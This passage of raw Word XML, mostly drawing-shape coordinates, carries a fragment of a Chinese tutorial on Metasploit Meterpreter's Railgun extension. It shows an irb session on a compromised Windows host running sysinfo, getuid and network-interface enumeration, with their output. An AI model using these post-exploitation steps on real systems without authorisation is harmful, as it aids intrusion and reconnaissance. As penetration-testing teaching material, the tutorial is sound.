        <v:shape style="position:absolute;left:3130;top:14470;width:130;height:270" coordorigin="3130,14470" coordsize="130,270" path="m3146,14491l3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3147,14491,3147,14491,3147,14491,3147,14491,3147,14491,3147,14491,3148,14491,3148,14491,3148,14491,3148,14491,3148,14491,3149,14491,3149,14491,3149,14491,3149,14491,3150,14491,3150,14491,3150,14491,3151,14491,3151,14491,3152,14491,3152,14491,3153,14491,3153,14491,3153,14491,3154,14491,3154,14491,3155,14491,3156,14491,3156,14491,3157,14491,3157,14491,3158,14491,3159,14491,3159,14491,3160,14491,3161,14491,3162,14491,3163,14491,3163,14491,3164,14491,3165,14491,3166,14491,3167,14491,3168,14491,3169,14491,3170,14491,3171,14491,3172,14491,3173,14491,3174,14491,3176,14491,3177,14491,3178,14491,3179,14491,3181,14491,3182,14491,3183,14491,3185,14491,3186,14491,3188,14491,3189,14491,3191,14491,3192,14491,3194,14491,3196,14491,3198,14491,3199,14491,3201,14491,3203,14491,3205,14491,3207,14491,3209,14491,3211,14491,3213,14491,3215,14491,3217,14491,3219,14491,3221,14491,3223,14491,3226,14491,3228,14491,3230,14491,3233,14491,3235,14491,3238,14491,3240,14491,3243,14491,3246,14491,3248,14491,3251,14491,3254,14491,3257,14491,3260,14491,3263,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14492,3266,14492,3266,14492,3266,14492,3266,14492,3266,14492,3266,14492,3266,14492,3266,14492,3266,14493,3266,14493,3266,14493,3266,14493,3266,14493,3266,14494,3266,14494,3266,14494,3266,14495,3266,14495,3266,14495,3266,14496,3266,14496,3266,14497,3266,14497,3266,14498,3266,14498,3266,14499,3266,14500,3266,14500,3266,14501,3266,14502,3266,14503,3266,14503,3266,14504,3266,14505,3266,14506,3266,14507,3266,14508,3266,14509,3266,14510,3266,14511,3266,14513,3266,14514,3266,14515,3266,14516,3266,14518,3266,14519,3266,14521,3266,14522,3266,14524,3266,14526,3266,14527,3266,14529,3266,14531,3266,14533,3266,14535,3266,14537,3266,14539,3266,14541,3266,14543,3266,14545,3266,14548,3266,14550,3266,14553,3266,14555,3266,14558,3266,14560,3266,14563,3266,14566,3266,14569,3266,14572,3266,14575,3266,14578,3266,14581,3266,14584,3266,14588,3266,14591,3266,14594,3266,14598,3266,14602,3266,14605,3266,14609,3266,14613,3266,14617,3266,14621,3266,14625,3266,14629,3266,14634,3266,14638,3266,14643,3266,14647,3266,14652,3266,14657,3266,14662,3266,14667,3266,14672,3266,14677,3266,14682,3266,14687,3266,14693,3266,14698,3266,14704,3266,14710,3266,14716,3266,14722,3266,14728,3266,14734,3266,14740,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3265,14746,3265,14746,3265,14746,3265,14746,3265,14746,3265,14746,3265,14746,3265,14746,3265,14746,3265,14746,3265,14746,3265,14746,3265,14746,3264,14746,3264,14746,3264,14746,3264,14746,3264,14746,3264,14746,3263,14746,3263,14746,3263,14746,3263,14746,3262,14746,3262,14746,3262,14746,3261,14746,3261,14746,3261,14746,3260,14746,3260,14746,3260,14746,3259,14746,3259,14746,3258,14746,3258,14746,3257,14746,3257,14746,3256,14746,3256,14746,3255,14746,3254,14746,3254,14746,3253,14746,3252,14746,3252,14746,3251,14746,3250,14746,3249,14746,3249,14746,3248,14746,3247,14746,3246,14746,3245,14746,3244,14746,3243,14746,3242,14746,3241,14746,3240,14746,3239,14746,3238,14746,3237,14746,3236,14746,3234,14746,3233,14746,3232,14746,3231,14746,3229,14746,3228,14746,3226,14746,3225,14746,3223,14746,3222,14746,3220,14746,3219,14746,3217,14746,3215,14746,3214,14746,3212,14746,3210,14746,3208,14746,3206,14746,3205,14746,3203,14746,3201,14746,3199,14746,3197,14746,3194,14746,3192,14746,3190,14746,3188,14746,3186,14746,3183,14746,3181,14746,3178,14746,3176,14746,3173,14746,3171,14746,3168,14746,3166,14746,3163,14746,3160,14746,3157,14746,3154,14746,3152,14746,3149,14746,3146,14746,3146,14746,3146,14746,3146,14746,3146,14746,3146,14746,3146,14746,3146,14746,3146,14746,3146,14746,3146,14746,3146,14746,3146,14746,3146,14746,3146,14746,3146,14746,3146,14746,3146,14746,3146,14746,3146,14746,3146,14745,3146,14745,3146,14745,3146,14745,3146,14745,3146,14744,3146,14744,3146,14744,3146,14743,3146,14743,3146,14743,3146,14742,3146,14742,3146,14741,3146,14741,3146,14740,3146,14740,3146,14739,3146,14739,3146,14738,3146,14737,3146,14737,3146,14736,3146,14735,3146,14734,3146,14734,3146,14733,3146,14732,3146,14731,3146,14730,3146,14729,3146,14728,3146,14726,3146,14725,3146,14724,3146,14723,3146,14721,3146,14720,3146,14718,3146,14717,3146,14715,3146,14714,3146,14712,3146,14710,3146,14709,3146,14707,3146,14705,3146,14703,3146,14701,3146,14699,3146,14697,3146,14695,3146,14692,3146,14690,3146,14688,3146,14685,3146,14683,3146,14680,3146,14677,3146,14675,3146,14672,3146,14669,3146,14666,3146,14663,3146,14660,3146,14657,3146,14653,3146,14650,3146,14647,3146,14643,3146,14640,3146,14636,3146,14632,3146,14629,3146,14625,3146,14621,3146,14617,3146,14612,3146,14608,3146,14604,3146,14600,3146,14595,3146,14590,3146,14586,3146,14581,3146,14576,3146,14571,3146,14566,3146,14561,3146,14556,3146,14550,3146,14545,3146,14539,3146,14534,3146,14528,3146,14522,3146,14516,3146,14510,3146,14504,3146,14498,3146,14491e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:162.500pt;margin-top:723.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3250,14470" coordsize="130,270">
        <v:shape style="position:absolute;left:3250;top:14470;width:130;height:270" coordorigin="3250,14470" coordsize="130,270" path="m3266,14491l3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3267,14491,3267,14491,3267,14491,3267,14491,3267,14491,3267,14491,3267,14491,3268,14491,3268,14491,3268,14491,3268,14491,3268,14491,3269,14491,3269,14491,3269,14491,3270,14491,3270,14491,3270,14491,3271,14491,3271,14491,3271,14491,3272,14491,3272,14491,3273,14491,3273,14491,3274,14491,3274,14491,3275,14491,3275,14491,3276,14491,3276,14491,3277,14491,3277,14491,3278,14491,3279,14491,3280,14491,3280,14491,3281,14491,3282,14491,3283,14491,3283,14491,3284,14491,3285,14491,3286,14491,3287,14491,3288,14491,3289,14491,3290,14491,3291,14491,3292,14491,3293,14491,3295,14491,3296,14491,3297,14491,3298,14491,3299,14491,3301,14491,3302,14491,3304,14491,3305,14491,3306,14491,3308,14491,3309,14491,3311,14491,3313,14491,3314,14491,3316,14491,3318,14491,3319,14491,3321,14491,3323,14491,3325,14491,3327,14491,3329,14491,3331,14491,3333,14491,3335,14491,3337,14491,3339,14491,3341,14491,3343,14491,3346,14491,3348,14491,3350,14491,3353,14491,3355,14491,3358,14491,3360,14491,3363,14491,3366,14491,3368,14491,3371,14491,3374,14491,3377,14491,3380,14491,3383,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14492,3386,14492,3386,14492,3386,14492,3386,14492,3386,14492,3386,14492,3386,14492,3386,14492,3386,14493,3386,14493,3386,14493,3386,14493,3386,14493,3386,14494,3386,14494,3386,14494,3386,14495,3386,14495,3386,14495,3386,14496,3386,14496,3386,14497,3386,14497,3386,14498,3386,14498,3386,14499,3386,14500,3386,14500,3386,14501,3386,14502,3386,14503,3386,14503,3386,14504,3386,14505,3386,14506,3386,14507,3386,14508,3386,14509,3386,14510,3386,14511,3386,14513,3386,14514,3386,14515,3386,14516,3386,14518,3386,14519,3386,14521,3386,14522,3386,14524,3386,14526,3386,14527,3386,14529,3386,14531,3386,14533,3386,14535,3386,14537,3386,14539,3386,14541,3386,14543,3386,14545,3386,14548,3386,14550,3386,14553,3386,14555,3386,14558,3386,14560,3386,14563,3386,14566,3386,14569,3386,14572,3386,14575,3386,14578,3386,14581,3386,14584,3386,14588,3386,14591,3386,14594,3386,14598,3386,14602,3386,14605,3386,14609,3386,14613,3386,14617,3386,14621,3386,14625,3386,14629,3386,14634,3386,14638,3386,14643,3386,14647,3386,14652,3386,14657,3386,14662,3386,14667,3386,14672,3386,14677,3386,14682,3386,14687,3386,14693,3386,14698,3386,14704,3386,14710,3386,14716,3386,14722,3386,14728,3386,14734,3386,14740,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3385,14746,3385,14746,3385,14746,3385,14746,3385,14746,3385,14746,3385,14746,3385,14746,3385,14746,3385,14746,3385,14746,3384,14746,3384,14746,3384,14746,3384,14746,3384,14746,3384,14746,3383,14746,3383,14746,3383,14746,3383,14746,3382,14746,3382,14746,3382,14746,3381,14746,3381,14746,3381,14746,3380,14746,3380,14746,3380,14746,3379,14746,3379,14746,3378,14746,3378,14746,3377,14746,3377,14746,3376,14746,3376,14746,3375,14746,3374,14746,3374,14746,3373,14746,3373,14746,3372,14746,3371,14746,3370,14746,3370,14746,3369,14746,3368,14746,3367,14746,3366,14746,3365,14746,3364,14746,3363,14746,3362,14746,3361,14746,3360,14746,3359,14746,3358,14746,3357,14746,3356,14746,3354,14746,3353,14746,3352,14746,3351,14746,3349,14746,3348,14746,3346,14746,3345,14746,3343,14746,3342,14746,3340,14746,3339,14746,3337,14746,3335,14746,3334,14746,3332,14746,3330,14746,3328,14746,3327,14746,3325,14746,3323,14746,3321,14746,3319,14746,3317,14746,3314,14746,3312,14746,3310,14746,3308,14746,3306,14746,3303,14746,3301,14746,3298,14746,3296,14746,3293,14746,3291,14746,3288,14746,3286,14746,3283,14746,3280,14746,3277,14746,3274,14746,3272,14746,3269,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14745,3266,14745,3266,14745,3266,14745,3266,14745,3266,14744,3266,14744,3266,14744,3266,14743,3266,14743,3266,14743,3266,14742,3266,14742,3266,14741,3266,14741,3266,14740,3266,14740,3266,14739,3266,14739,3266,14738,3266,14737,3266,14737,3266,14736,3266,14735,3266,14734,3266,14734,3266,14733,3266,14732,3266,14731,3266,14730,3266,14729,3266,14728,3266,14726,3266,14725,3266,14724,3266,14723,3266,14721,3266,14720,3266,14718,3266,14717,3266,14715,3266,14714,3266,14712,3266,14710,3266,14709,3266,14707,3266,14705,3266,14703,3266,14701,3266,14699,3266,14697,3266,14695,3266,14692,3266,14690,3266,14688,3266,14685,3266,14683,3266,14680,3266,14677,3266,14675,3266,14672,3266,14669,3266,14666,3266,14663,3266,14660,3266,14657,3266,14653,3266,14650,3266,14647,3266,14643,3266,14640,3266,14636,3266,14632,3266,14629,3266,14625,3266,14621,3266,14617,3266,14612,3266,14608,3266,14604,3266,14600,3266,14595,3266,14590,3266,14586,3266,14581,3266,14576,3266,14571,3266,14566,3266,14561,3266,14556,3266,14550,3266,14545,3266,14539,3266,14534,3266,14528,3266,14522,3266,14516,3266,14510,3266,14504,3266,14498,3266,14491e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:168.500pt;margin-top:723.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3370,14470" coordsize="130,270">
        <v:shape style="position:absolute;left:3370;top:14470;width:130;height:270" coordorigin="3370,14470" coordsize="130,270" path="m3386,14491l3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3387,14491,3387,14491,3387,14491,3387,14491,3387,14491,3387,14491,3387,14491,3388,14491,3388,14491,3388,14491,3388,14491,3389,14491,3389,14491,3389,14491,3389,14491,3390,14491,3390,14491,3390,14491,3391,14491,3391,14491,3391,14491,3392,14491,3392,14491,3393,14491,3393,14491,3394,14491,3394,14491,3395,14491,3395,14491,3396,14491,3396,14491,3397,14491,3398,14491,3398,14491,3399,14491,3400,14491,3400,14491,3401,14491,3402,14491,3403,14491,3404,14491,3404,14491,3405,14491,3406,14491,3407,14491,3408,14491,3409,14491,3410,14491,3411,14491,3412,14491,3413,14491,3415,14491,3416,14491,3417,14491,3418,14491,3420,14491,3421,14491,3422,14491,3424,14491,3425,14491,3426,14491,3428,14491,3429,14491,3431,14491,3433,14491,3434,14491,3436,14491,3438,14491,3439,14491,3441,14491,3443,14491,3445,14491,3447,14491,3449,14491,3451,14491,3453,14491,3455,14491,3457,14491,3459,14491,3461,14491,3464,14491,3466,14491,3468,14491,3471,14491,3473,14491,3475,14491,3478,14491,3481,14491,3483,14491,3486,14491,3489,14491,3491,14491,3494,14491,3497,14491,3500,14491,3503,14491,3506,14491,3506,14491,3506,14491,3506,14491,3506,14491,3506,14491,3506,14491,3506,14491,3506,14491,3506,14491,3506,14491,3506,14491,3506,14492,3506,14492,3506,14492,3506,14492,3506,14492,3506,14492,3506,14492,3506,14492,3506,14492,3506,14493,3506,14493,3506,14493,3506,14493,3506,14493,3506,14494,3506,14494,3506,14494,3506,14495,3506,14495,3506,14495,3506,14496,3506,14496,3506,14497,3506,14497,3506,14498,3506,14498,3506,14499,3506,14500,3506,14500,3506,14501,3506,14502,3506,14503,3506,14503,3506,14504,3506,14505,3506,14506,3506,14507,3506,14508,3506,14509,3506,14510,3506,14511,3506,14513,3506,14514,3506,14515,3506,14516,3506,14518,3506,14519,3506,14521,3506,14522,3506,14524,3506,14526,3506,14527,3506,14529,3506,14531,3506,14533,3506,14535,3506,14537,3506,14539,3506,14541,3506,14543,3506,14545,3506,14548,3506,14550,3506,14553,3506,14555,3506,14558,3506,14560,3506,14563,3506,14566,3506,14569,3506,14572,3506,14575,3506,14578,3506,14581,3506,14584,3506,14588,3506,14591,3506,14594,3506,14598,3506,14602,3506,14605,3506,14609,3506,14613,3506,14617,3506,14621,3506,14625,3506,14629,3506,14634,3506,14638,3506,14643,3506,14647,3506,14652,3506,14657,3506,14662,3506,14667,3506,14672,3506,14677,3506,14682,3506,14687,3506,14693,3506,14698,3506,14704,3506,14710,3506,14716,3506,14722,3506,14728,3506,14734,3506,14740,3506,14746,3506,14746,3506,14746,3506,14746,3506,14746,3506,14746,3506,14746,3506,14746,3506,14746,3506,14746,3506,14746,3506,14746,3506,14746,3506,14746,3506,14746,3506,14746,3506,14746,3505,14746,3505,14746,3505,14746,3505,14746,3505,14746,3505,14746,3505,14746,3505,14746,3505,14746,3505,14746,3505,14746,3504,14746,3504,14746,3504,14746,3504,14746,3504,14746,3503,14746,3503,14746,3503,14746,3503,14746,3502,14746,3502,14746,3502,14746,3502,14746,3501,14746,3501,14746,3500,14746,3500,14746,3500,14746,3499,14746,3499,14746,3498,14746,3498,14746,3497,14746,3497,14746,3496,14746,3496,14746,3495,14746,3495,14746,3494,14746,3493,14746,3493,14746,3492,14746,3491,14746,3490,14746,3490,14746,3489,14746,3488,14746,3487,14746,3486,14746,3485,14746,3484,14746,3483,14746,3482,14746,3481,14746,3480,14746,3479,14746,3478,14746,3477,14746,3476,14746,3474,14746,3473,14746,3472,14746,3471,14746,3469,14746,3468,14746,3466,14746,3465,14746,3464,14746,3462,14746,3460,14746,3459,14746,3457,14746,3456,14746,3454,14746,3452,14746,3450,14746,3448,14746,3447,14746,3445,14746,3443,14746,3441,14746,3439,14746,3437,14746,3435,14746,3432,14746,3430,14746,3428,14746,3426,14746,3423,14746,3421,14746,3418,14746,3416,14746,3413,14746,3411,14746,3408,14746,3406,14746,3403,14746,3400,14746,3397,14746,3395,14746,3392,14746,3389,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14745,3386,14745,3386,14745,3386,14745,3386,14745,3386,14744,3386,14744,3386,14744,3386,14743,3386,14743,3386,14743,3386,14742,3386,14742,3386,14741,3386,14741,3386,14740,3386,14740,3386,14739,3386,14739,3386,14738,3386,14737,3386,14737,3386,14736,3386,14735,3386,14734,3386,14734,3386,14733,3386,14732,3386,14731,3386,14730,3386,14729,3386,14728,3386,14726,3386,14725,3386,14724,3386,14723,3386,14721,3386,14720,3386,14718,3386,14717,3386,14715,3386,14714,3386,14712,3386,14710,3386,14709,3386,14707,3386,14705,3386,14703,3386,14701,3386,14699,3386,14697,3386,14695,3386,14692,3386,14690,3386,14688,3386,14685,3386,14683,3386,14680,3386,14677,3386,14675,3386,14672,3386,14669,3386,14666,3386,14663,3386,14660,3386,14657,3386,14653,3386,14650,3386,14647,3386,14643,3386,14640,3386,14636,3386,14632,3386,14629,3386,14625,3386,14621,3386,14617,3386,14612,3386,14608,3386,14604,3386,14600,3386,14595,3386,14590,3386,14586,3386,14581,3386,14576,3386,14571,3386,14566,3386,14561,3386,14556,3386,14550,3386,14545,3386,14539,3386,14534,3386,14528,3386,14522,3386,14516,3386,14510,3386,14504,3386,14498,3386,1449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38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Railgun是Meterpreter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-22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stdapi的扩展，允许任意加载DLL。Railgun的最大好处是能够动态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访问系统上的整个Windows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API。通过从用户进程调用Windows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API。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meterpreter下执行irb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>进入ruby交互。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基</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>本的信息搜集：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sysinfo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'OS'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"Windows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.NET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(Build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3790,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Service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2)."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sys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getuid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"WIN03X64\\Administrator"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interfaces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interfaces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2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#&lt;Rex::Post::Meterpreter::Extensions::Stdapi::Net::Interface:0x000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055aee92c5770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@index=65539,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@mac_addr="\x00\f)\x85\xD6}",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@mac_name="Inte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l(R)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PRO/1000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MT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Network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Connection",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@mtu=1500,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@flags=nil,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@addrs=["19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2.168.1.119"],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@netmasks=["255.255.255.0"],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@scopes=[]&gt;,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erpreter::Extensions::Stdapi::Net::Interface:0x000055aee92c5220</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-49"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>@index=1,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@mac_addr="",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@mac_name="MS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Loopback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interface",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@mtu=1520,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@flags=ni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@addrs=["127.0.0.1"],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@netmasks=[],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@scopes=[]&gt;]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interfaces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each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do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?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puts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i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pretty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1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0076a9"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>end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65539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Network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Hardware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29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85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:d6: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7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MTU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1500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IPv4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.119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IPv4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Netmask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255.255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.255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12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1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3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=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Loopback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interface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Hardware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MAC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00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22.586pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,4451">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:4451" coordorigin="10402,0" coordsize="0,4451" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,1,10402,2,10402,3,10402,4,10402,5,10402,7,10402,8,10402,10,10402,12,10402,15,10402,18,10402,21,10402,24,10402,28,10402,32,10402,36,10402,41,10402,46,10402,51,10402,57,10402,64,10402,71,10402,78,10402,86,10402,94,10402,103,10402,113,10402,123,10402,133,10402,144,10402,156,10402,169,10402,182,10402,195,10402,210,10402,225,10402,240,10402,257,10402,274,10402,292,10402,310,10402,330,10402,350,10402,371,10402,393,10402,415,10402,439,10402,463,10402,489,10402,515,10402,542,10402,570,10402,599,10402,629,10402,660,10402,692,10402,725,10402,759,10402,794,10402,830,10402,867,10402,906,10402,945,10402,986,10402,1027,10402,1070,10402,1114,10402,1159,10402,1206,10402,1253,10402,1302,10402,1352,10402,1403,10402,1456,10402,1510,10402,1565,10402,1622,10402,1680,10402,1739,10402,1800,10402,1862,10402,1925,10402,1990,10402,2057,10402,2124,10402,2194,10402,2264,10402,2337,10402,2411,10402,2486,10402,2563,10402,2641,10402,2721,10402,2803,10402,2886,10402,2971,10402,3058,10402,3146,10402,3236,10402,3327,10402,3421,10402,3516,10402,3612,10402,3711,10402,3811,10402,3913,10402,4017,10402,4123,10402,4231,10402,4340,10402,4451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00.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1710" coordsize="8990,2010">
        <v:shape style="position:absolute;left:1490;top:1710;width:8990;height:2010" coordorigin="1490,1710" coordsize="8990,201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6,10484,1736,10484,1736,10484,1737,10484,1737,10484,1738,10484,1739,10484,1740,10484,1741,10484,1742,10484,1743,10484,1744,10484,1746,10484,1747,10484,1749,10484,1751,10484,1753,10484,1756,10484,1758,10484,1761,10484,1764,10484,1767,10484,1770,10484,1774,10484,1777,10484,1781,10484,1786,10484,1790,10484,1795,10484,1800,10484,1805,10484,1811,10484,1817,10484,1823,10484,1829,10484,1836,10484,1843,10484,1850,10484,1858,10484,1866,10484,1874,10484,1883,10484,1892,10484,1901,10484,1911,10484,1921,10484,1932,10484,1943,10484,1954,10484,1966,10484,1978,10484,1991,10484,2004,10484,2017,10484,2031,10484,2045,10484,2060,10484,2075,10484,2091,10484,2107,10484,2124,10484,2141,10484,2159,10484,2177,10484,2196,10484,2215,10484,2235,10484,2255,10484,2276,10484,2297,10484,2319,10484,2341,10484,2364,10484,2388,10484,2412,10484,2437,10484,2462,10484,2488,10484,2515,10484,2542,10484,2570,10484,2598,10484,2627,10484,2657,10484,2688,10484,2719,10484,2750,10484,2783,10484,2816,10484,2850,10484,2884,10484,2919,10484,2955,10484,2992,10484,3029,10484,3067,10484,3106,10484,3146,10484,3186,10484,3227,10484,3269,10484,3311,10484,3355,10484,3399,10484,3444,10484,3490,10484,3536,10484,3584,10484,3632,10484,3681,10484,3731,10484,3731,10484,3731,10484,3731,10484,3731,10484,3731,10484,3731,10483,3731,10482,3731,10482,3731,10480,3731,10479,3731,10477,3731,10475,3731,10473,3731,10470,3731,10466,3731,10462,3731,10458,3731,10453,3731,10448,3731,10442,3731,10435,3731,10428,3731,10419,3731,10411,3731,10401,3731,10391,3731,10379,3731,10367,3731,10354,3731,10340,3731,10326,3731,10310,3731,10293,3731,10275,3731,10256,3731,10236,3731,10215,3731,10192,3731,10168,3731,10143,3731,10117,3731,10090,3731,10061,3731,10031,3731,9999,3731,9966,3731,9931,3731,9895,3731,9858,3731,9819,3731,9778,3731,9735,3731,9691,3731,9646,3731,9598,3731,9549,3731,9498,3731,9445,3731,9391,3731,9334,3731,9275,3731,9215,3731,9153,3731,9088,3731,9022,3731,8953,3731,8883,3731,8810,3731,8735,3731,8658,3731,8578,3731,8497,3731,8413,3731,8326,3731,8238,3731,8146,3731,8053,3731,7957,3731,7859,3731,7758,3731,7654,3731,7548,3731,7439,3731,7328,3731,7214,3731,7097,3731,6977,3731,6855,3731,6730,3731,6602,3731,6471,3731,6337,3731,6201,3731,6061,3731,5918,3731,5773,3731,5624,3731,5472,3731,5317,3731,5159,3731,4997,3731,4833,3731,4665,3731,4494,3731,4319,3731,4141,3731,3960,3731,3776,3731,3587,3731,3396,3731,3201,3731,3002,3731,2800,3731,2594,3731,2385,3731,2172,3731,1955,3731,1734,3731,1510,3731,1510,3731,1510,3731,1510,3731,1510,3731,1510,3731,1510,3731,1510,3731,1510,3730,1510,3730,1510,3730,1510,3730,1510,3729,1510,3729,1510,3728,1510,3728,1510,3727,1510,3726,1510,3725,1510,3724,1510,3723,1510,3721,1510,3720,1510,3718,1510,3716,1510,3715,1510,3712,1510,3710,1510,3708,1510,3705,1510,3702,1510,3699,1510,3696,1510,3692,1510,3688,1510,3684,1510,3680,1510,3676,1510,3671,1510,3666,1510,3661,1510,3655,1510,3649,1510,3643,1510,3637,1510,3630,1510,3623,1510,3616,1510,3608,1510,3600,1510,3592,1510,3583,1510,3574,1510,3564,1510,3555,1510,3544,1510,3534,1510,3523,1510,3512,1510,3500,1510,3488,1510,3475,1510,3462,1510,3449,1510,3435,1510,3420,1510,3406,1510,3390,1510,3375,1510,3358,1510,3342,1510,3325,1510,3307,1510,3289,1510,3270,1510,3251,1510,3231,1510,3211,1510,3190,1510,3169,1510,3147,1510,3124,1510,3101,1510,3078,1510,3054,1510,3029,1510,3003,1510,2977,1510,2951,1510,2924,1510,2896,1510,2867,1510,2838,1510,2809,1510,2778,1510,2747,1510,2715,1510,2683,1510,2650,1510,2616,1510,2582,1510,2546,1510,2511,1510,2474,1510,2437,1510,2399,1510,2360,1510,2320,1510,2280,1510,2239,1510,2197,1510,2154,1510,2111,1510,2067,1510,2022,1510,1976,1510,1929,1510,1882,1510,1834,1510,1785,1510,1735e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:86.500pt;width:1.500pt;height:99.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1730" coordsize="30,1990">
        <v:shape style="position:absolute;left:1490;top:1730;width:30;height:1990" coordorigin="1490,1730" coordsize="30,1990" path="m1517,1735l1517,1735,1517,1735,1517,1735,1517,1735,1517,1735,1517,1735,1517,1735,1517,1735,1517,1735,1517,1736,1517,1736,1517,1736,1517,1737,1517,1737,1517,1738,1517,1739,1517,1740,1517,1741,1517,1742,1517,1743,1517,1744,1517,1746,1517,1747,1517,1749,1517,1751,1517,1753,1517,1756,1517,1758,1517,1761,1517,1764,1517,1767,1517,1770,1517,1774,1517,1777,1517,1781,1517,1786,1517,1790,1517,1795,1517,1800,1517,1805,1517,1811,1517,1817,1517,1823,1517,1829,1517,1836,1517,1843,1517,1850,1517,1858,1517,1866,1517,1874,1517,1883,1517,1892,1517,1901,1517,1911,1517,1921,1517,1932,1517,1943,1517,1954,1517,1966,1517,1978,1517,1991,1517,2004,1517,2017,1517,2031,1517,2045,1517,2060,1517,2075,1517,2091,1517,2107,1517,2124,1517,2141,1517,2159,1517,2177,1517,2196,1517,2215,1517,2235,1517,2255,1517,2276,1517,2297,1517,2319,1517,2341,1517,2364,1517,2388,1517,2412,1517,2437,1517,2462,1517,2488,1517,2515,1517,2542,1517,2570,1517,2598,1517,2627,1517,2657,1517,2688,1517,2719,1517,2750,1517,2783,1517,2816,1517,2850,1517,2884,1517,2919,1517,2955,1517,2992,1517,3029,1517,3067,1517,3106,1517,3146,1517,3186,1517,3227,1517,3269,1517,3311,1517,3355,1517,3399,1517,3444,1517,3490,1517,3536,1517,3584,1517,3632,1517,3681,1517,3731e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:185.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,3710" coordsize="8990,370">
